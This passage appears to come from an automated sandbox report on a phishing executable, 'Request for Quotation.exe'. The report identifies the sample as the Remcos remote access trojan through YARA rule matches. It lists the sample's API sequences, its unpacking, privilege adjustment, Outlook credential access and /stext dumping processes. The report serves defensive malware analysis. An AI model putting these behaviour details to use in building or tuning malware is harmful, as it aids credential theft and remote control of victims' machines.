raits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait1_1_0040D2A6
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004382F35_2_004382F3
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004305755_2_00430575
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0043B6715_2_0043B671
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0041F6CD5_2_0041F6CD
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004119CF5_2_004119CF
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00439B115_2_00439B11
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00438E545_2_00438E54
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00412F675_2_00412F67
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0043CF185_2_0043CF18
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0041E13A5_1_0041E13A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_004225895_1_00422589
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0041F6CD5_1_0041F6CD
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0043CF185_1_0043CF18
          Source: Request for Quotation.exe, 00000000.00000003.638628482.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000000.00000002.642974977.0000000000A40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000001.00000003.654310142.0000000002A69000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Request for Quotation.exe
          Source: Request for Quotation.exeBinary or memory string: OriginalFileName vs Request for Quotation.exe
          Source: Request for Quotation.exeBinary or memory string: OriginalFilename vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000004.00000001.651818512.000000000041B000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Request for Quotation.exe
          Source: Request for Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/6@0/2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,3_2_004182CE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_0040EC0F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_1_0040EC0F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,4_2_00410DE1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,4_1_00410DE1
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404763
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6EEE4211 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_6EEE4211
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,1_2_00409D02
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00411927
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Roaming\excelJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeMutant created: \Sessions\1\BaseNamedObjects\excel-8OHAVR
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsh7777.tmpJump to behavior
          Source: Request for Quotation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Request for Quotation.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Request for Quotation.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: Request for Quotation.exe, 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: Request for Quotation.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Request for Quotation.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Request for Quotation.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Request for Quotation.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: Request for Quotation.exeVirustotal: Detection: 27%
          Source: Request for Quotation.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile read: C:\Users\user\Desktop\Request for Quotation.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'
          Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile opened: C:\Users\user\Desktop\Request for Quotation.cfgJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: Request for Quotation.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Request for Quotation.exe, 00000000.00000003.638506500.0000000002A70000.00000004.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 1.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 3.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 4.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 5.2.Request for Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\Request for Quotation.exeUnpacked PE file: 1.2.Request for Quotation.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6F711A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F711A98
          Source: aqx5kku77.dll.0.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6F712F60 push eax; ret 0_2_6F712F8E
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00413ED0 push eax; ret 1_2_00413EFE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00413ED0 push eax; ret 1_1_00413EFE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00416794 push ecx; ret 3_1_004167EC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044693D push ecx; ret 3_1_0044694D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044DB70 push eax; ret 3_1_0044DB84
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044DB70 push eax; ret 3_1_0044DBAC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00403C9C push ds; retf 3_1_00403D3A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00451D54 push eax; ret 3_1_00451D61
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00414060 push eax; ret 4_2_00414074
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00414060 push eax; ret 4_2_0041409C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00414039 push ecx; ret 4_2_00414049
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004164EB push 0000006Ah; retf 4_2_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00416553 push 0000006Ah; retf 4_2_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00416555 push 0000006Ah; retf 4_2_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00414060 push eax; ret 4_1_00414074
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00414060 push eax; ret 4_1_0041409C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00414039 push ecx; ret 4_1_00414049
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_004164EB push 0000006Ah; retf 4_1_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00416553 push 0000006Ah; retf 4_1_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00416555 push 0000006Ah; retf 4_1_004165C4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_00407A7A push 368B2BCFh; retn 29E8h4_1_00407ABD
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00444355 push ecx; ret 5_2_00444365
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004446D0 push eax; ret 5_2_004446E4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004446D0 push eax; ret 5_2_0044470C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0044AC84 push eax; ret 5_2_0044AC91
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0040E2C0 pushad ; iretd 5_1_0040E2C1
          Source: initial sampleStatic PE information: section name: .data entropy: 7.91187275954
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_2_0040D4E5
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\aqx5kku77.dllJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00411700
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_00409908
          Source: C:\Users\user\Desktop\Request for Quotation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@
QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,